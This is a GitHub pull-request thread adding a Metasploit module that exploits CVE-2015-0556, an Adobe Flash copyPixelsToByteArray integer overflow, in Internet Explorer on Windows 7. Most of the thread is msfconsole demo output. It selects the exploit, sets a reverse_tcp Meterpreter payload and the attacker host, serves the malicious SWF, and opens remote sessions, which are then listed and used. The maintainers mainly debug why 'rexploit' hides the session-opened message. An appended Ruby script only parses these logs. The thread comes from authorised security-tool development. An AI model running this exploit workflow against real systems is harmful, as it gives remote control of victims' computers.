Add module for CVE-2015-0556 (Flash copyPixelsToByteArray int overflow) #5154

Merged
merged 1 commit into from
Apr 17, 2015

Conversation

jvazquez-r7
Contributor

Full history in the module References. Another flash bug from Zero Day Initiative which was also exploited in the wild.

This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145 and 14.0.0.125.

Verification

  • Install Windows 7 SP1 (32 bit)
  • Install IE 8, 9, 10 or 11, whichever you prefer
  • Install Flash 14 <= 14.0.0.176, whichever you prefer
  • Run the module like in the demo
  • VERIFY the "adobe_flash_copy_pixels_to_byte_array - Exploit requirement(s) not met: flash. For more info: http://r-7.co/PVbcgx" message is shown if the browser requirements aren't met
  • VERIFY you get a session if your environment is vulnerable

DEMO

msf > use exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(adobe_flash_copy_pixels_to_byte_array) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://172.16.158.1:8080/qw5Iiad8
[*] Server started.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[!] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Exploit requirement(s) not met: flash. For more info: http://r-7.co/PVbcgx
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /qw5Iiad8/WTygDs/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /qw5Iiad8/WTygDs/EDsHwx.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 172.16.158.131

@jvazquez-r7
Contributor Author

ping @bcook-r7, this pull request shows the "only sending stage message" behavior:

msf exploit(adobe_flash_copy_pixels_to_byte_array) >
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /qw5Iiad8/WTygDs/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /qw5Iiad8/WTygDs/Bztuk.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 172.16.158.131
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /qw5Iiad8/WTygDs/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /qw5Iiad8/WTygDs/ECsi.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 172.16.158.131
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /qw5Iiad8/WTygDs/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /qw5Iiad8/WTygDs/lnobV.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 172.16.158.131

But the sessions are opening correctly:

msf exploit(adobe_flash_copy_pixels_to_byte_array) > sessions

Active sessions
===============

  Id  Type                   Information                                     Connection
  --  ----                   -----------                                     ----------
  5   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  172.16.158.1:4444 -> 172.16.158.131:49230 (172.16.158.131)
  6   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  172.16.158.1:4444 -> 172.16.158.131:49238 (172.16.158.131)
  7   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  172.16.158.1:4444 -> 172.16.158.131:49245 (172.16.158.131)

msf exploit(adobe_flash_copy_pixels_to_byte_array) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > exit -y

@bcook-r7
Contributor

What's different between how I ran it and how you did? I think that's probably the key:

msf exploit(adobe_flash_copy_pixels_to_byte_array) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set uripath aaa
uripath => aaa
msf exploit(adobe_flash_copy_pixels_to_byte_array) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.1:4444
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://192.168.56.1:8080/aaa
[*] Server started.
[*] 192.168.56.1     adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 192.168.56.1     adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 192.168.56.1     adobe_flash_copy_pixels_to_byte_array - Request: /aaa/GPUBpG/
[*] 192.168.56.1     adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 192.168.56.1     adobe_flash_copy_pixels_to_byte_array - Request: /aaa/GPUBpG/HVvktQ.swf
[*] 192.168.56.1     adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:60668) at 2015-04-15 22:47:00 -0500

@jvazquez-r7
Contributor Author

I don't set uripath, but I'm not sure if it's related; testing.

@jvazquez-r7
Contributor Author

No difference here even after setting uripath:

  • no uripath:
msf > use exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array         
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(adobe_flash_copy_pixels_to_byte_array) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://172.16.158.1:8080/blPfhg48
[*] Server started.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /blPfhg48/zdYsFk/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /blPfhg48/zdYsFk/fIuMrt.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 172.16.158.131
  • with uripath:
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set uripath aaa
uripath => aaa
msf exploit(adobe_flash_copy_pixels_to_byte_array) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://172.16.158.1:8080/aaa
[*] Server started.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /aaa/eOCbAu/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /aaa/eOCbAu/dNswKu.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 172.16.158.131

@bcook-r7
Contributor

Maybe it's 'run' vs 'rexploit', or environmental.

@bcook-r7
Contributor

That's it! Using 'run' displays the notification, using 'rexploit' does not.

@jvazquez-r7
Contributor Author

I don't see anything here with run either :(

msf exploit(adobe_flash_copy_pixels_to_byte_array) > run
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://172.16.158.1:8080/aaa
[*] Server started.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /aaa/eOCbAu/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /aaa/eOCbAu/amHKA.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /aaa/eOCbAu/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /aaa/eOCbAu/Wxrv.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 172.16.158.131

msf exploit(adobe_flash_copy_pixels_to_byte_array) >
msf exploit(adobe_flash_copy_pixels_to_byte_array) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf exploit(adobe_flash_copy_pixels_to_byte_array) > run
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://172.16.158.1:8080/aaa
[*] Server started.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /aaa/eOCbAu/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /aaa/eOCbAu/wPfaVx.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 172.16.158.131

msf exploit(adobe_flash_copy_pixels_to_byte_array) >
msf exploit(adobe_flash_copy_pixels_to_byte_array) > sessions

Active sessions
===============

  Id  Type                   Information                                     Connection
  --  ----                   -----------                                     ----------
  1   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  172.16.158.1:4444 -> 172.16.158.131:49299 (172.16.158.131)
  2   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  172.16.158.1:4444 -> 172.16.158.131:49337 (172.16.158.131)
  3   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  172.16.158.1:4444 -> 172.16.158.131:49356 (172.16.158.131)
  4   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  172.16.158.1:4444 -> 172.16.158.131:49360 (172.16.158.131)

@wchen-r7
Contributor

@bcook-r7 So sounds like you're reproducing the issue, right? Can I go ahead and start testing this module and then land it? Or would you like me to hold for longer? Thx!

@wchen-r7
Contributor

This module works for me:

msf > use exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array
msf exploit(adobe_flash_copy_pixels_to_byte_array) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.64:4444 
[*] Using URL: http://0.0.0.0:8080/hjQbZjTbUJPW
[*] Local IP: http://192.168.1.64:8080/hjQbZjTbUJPW
[*] Server started.
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Request: /hjQbZjTbUJPW/NYKHBg/
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Request: /hjQbZjTbUJPW/NYKHBg/ppPUfu.swf
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 192.168.1.168
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.168:50913) at 2015-04-16 20:28:19 -0500

@bcook-r7
Contributor

I reproduced with rexploit - I don't think that should be a blocker for this module :)
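As an added example (not code from this pull request or from the Metasploit project), the following Ruby script makes the "only sending stage message" behaviour discussed in this thread checkable mechanically: it pairs each "Sending stage" line of an msfconsole transcript with the "Meterpreter session N opened" line that normally follows it, and counts the rows of a `sessions` table, so a stage that was delivered but never announced can be told apart from a stage that produced no session at all. The transcripts and the `sessions` table embedded below are constructed from the outputs quoted above; the function names and regular expressions are assumptions of the example, not part of the framework.

```ruby
# Added example, not code from the Metasploit module or this pull request.
# Pairs "Sending stage" lines with "Meterpreter session N opened" lines and
# counts rows of a `sessions` table, so an unannounced session can be spotted.

STAGE_RE   = /\A\[\*\] Sending stage \((\d+) bytes\) to (\S+)\z/
SESSION_RE = /\A\[\*\] Meterpreter session (\d+) opened \(\S+ -> (\S+):\d+\)/
# A data row of the `sessions` table: an id followed by the session type.
SESSION_ROW_RE = /\A\s*(\d+)\s+meterpreter\b/

# One hash per stage delivery: :peer, :bytes and :session (the id printed by
# the matching "opened" line, or nil when no such line followed).
def pair_stages_with_sessions(transcript)
  results = []
  pending = []   # deliveries still waiting for an "opened" line
  transcript.each_line(chomp: true) do |line|
    if (m = STAGE_RE.match(line))
      entry = { peer: m[2], bytes: m[1].to_i, session: nil }
      results << entry
      pending << entry
    elsif (m = SESSION_RE.match(line))
      idx = pending.index { |e| e[:peer] == m[2] }
      pending.delete_at(idx)[:session] = m[1].to_i if idx
    end
  end
  results
end

# Stage deliveries that never produced a visible "session opened" line.
def silent_stage_count(transcript)
  pair_stages_with_sessions(transcript).count { |e| e[:session].nil? }
end

# Number of meterpreter rows in the output of the `sessions` command.
def active_session_count(sessions_output)
  sessions_output.each_line.count { |l| SESSION_ROW_RE.match?(l) }
end

# Summarises whether sessions opened but went unannounced.
def report(transcript, sessions_output)
  silent = silent_stage_count(transcript)
  active = active_session_count(sessions_output)
  "#{silent} stage(s) without an 'opened' line, #{active} session(s) in the sessions table"
end

# Constructed transcript of a `run`: the notification is printed.
RUN_TRANSCRIPT = <<~LOG
  [*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Sending SWF...
  [*] Sending stage (881664 bytes) to 192.168.1.168
  [*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.168:50913) at 2015-04-16 20:28:19 -0500
LOG

# Constructed transcript of a `rexploit`: two stages sent, no notification.
REXPLOIT_TRANSCRIPT = <<~LOG
  [*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
  [*] Sending stage (881664 bytes) to 172.16.158.131
  [*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
  [*] Sending stage (881664 bytes) to 172.16.158.131
LOG

# Constructed `sessions` output for the rexploit case: the sessions do exist.
REXPLOIT_SESSIONS = <<~'TABLE'
  Active sessions
  ===============

    Id  Type                   Information                                     Connection
    --  ----                   -----------                                     ----------
    1   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  172.16.158.1:4444 -> 172.16.158.131:49299 (172.16.158.131)
    2   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  172.16.158.1:4444 -> 172.16.158.131:49337 (172.16.158.131)
TABLE

if __FILE__ == $PROGRAM_NAME
  puts "run:      #{report(RUN_TRANSCRIPT, '')}"
  puts "rexploit: #{report(REXPLOIT_TRANSCRIPT, REXPLOIT_SESSIONS)}"
end
```

For the `run` transcript every stage is paired with an "opened" line; for the `rexploit` transcript both stages stay unpaired while the `sessions` table still lists two sessions, which is exactly the "stage sent, nothing announced, but `sessions` shows them" pattern reported above. Matching on the peer address rather than on line order keeps the pairing correct when several clients hit the server at once.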

@wchen-r7
Contributor

OK sounds good. Thanks!

@rajchandel

Can you provide me an Adobe Flash 14.0.0.176 download link?
